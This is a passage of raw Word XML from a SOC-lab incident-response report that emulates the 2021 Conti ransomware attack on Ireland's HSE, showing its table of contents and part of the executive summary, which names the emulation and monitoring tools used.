          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-2" \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc21725">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc21725 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1. Executive Summary</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc5001">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc5001 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lab Architecture &amp; Asset Register</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc14391">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc14391 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Incident Overview — HSE Ireland 2021</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10633">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc10633 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PREPARATION</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc29491">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc29491 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IDENTIFICATION</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc19017">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc19017 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CONTAINMENT</w:t>
              <w:tab/>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc16888">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc16888 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ERADICATION</w:t>
              <w:tab/>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc22660">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc22660 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>RECOVERY</w:t>
              <w:tab/>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc32453">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc32453 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LESSONS LEARNED</w:t>
              <w:tab/>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26180">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">7. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc26180 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IOC Master List</w:t>
              <w:tab/>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc6452">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">8. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc6452 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Full Mapping</w:t>
              <w:tab/>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="10080" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7049">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">— </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>End of Report —</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc7049 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:before="0" w:after="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="1A1A1A"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:sectPr>
              <w:headerReference w:type="even" r:id="rId3"/>
              <w:headerReference w:type="default" r:id="rId4"/>
              <w:headerReference w:type="first" r:id="rId5"/>
              <w:type w:val="nextPage"/>
              <w:pgSz w:w="12240" w:h="15840"/>
              <w:pgMar w:left="1080" w:right="1080" w:gutter="0" w:header="708" w:top="765" w:footer="0" w:bottom="720"/>
              <w:pgNumType w:fmt="decimal"/>
              <w:formProt w:val="false"/>
              <w:textDirection w:val="lrTb"/>
              <w:docGrid w:type="default" w:linePitch="360" w:charSpace="0"/>
            </w:sectPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc21725"/>
      <w:r>
        <w:rPr/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On 14 May 2021, Ireland's Health Service Executive (HSE) suffered the most devastating ransomware attack ever recorded against a national healthcare system. Threat actor group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Wizard Spider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conti ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across more than 80,000 endpoints, halting diagnostic imaging, cancelling chemotherapy appointments, and forcing the complete shutdown of IT systems serving one million patients. The attack took weeks of undetected dwell time — beginning with a malicious Excel macro on 18 March 2021 — before culminating in a simultaneous detonation that cost the Irish State over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>€100 million</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remediate over six months.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-fidelity adversarial emulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of that attack, conducted within the Spider Wizard SOC Home Lab. The simulation faithfully replicates Wizard Spider's documented Tactics, Techniques, and Procedures (TTPs) using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Atomic Red Team, Sliver C2, Sysmon, and Wazuh SIEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — executing each kill-chain phase against three domain-joined Windows targets (WS-EMP01, FS01, DC01) in an isolated VMware/VirtualBox environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The analysis follows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PICERL framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and produces: a complete forensic timeline with seven attack phases, Wazuh detection evidence correlated across Sysmon and Windows Event logs, three custom detection rules engineered to close identified coverage gaps, a full MITRE ATT&amp;CK mapping, and an actionable recommendations register.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:start w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="AED6F1"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FADBD8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="60"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
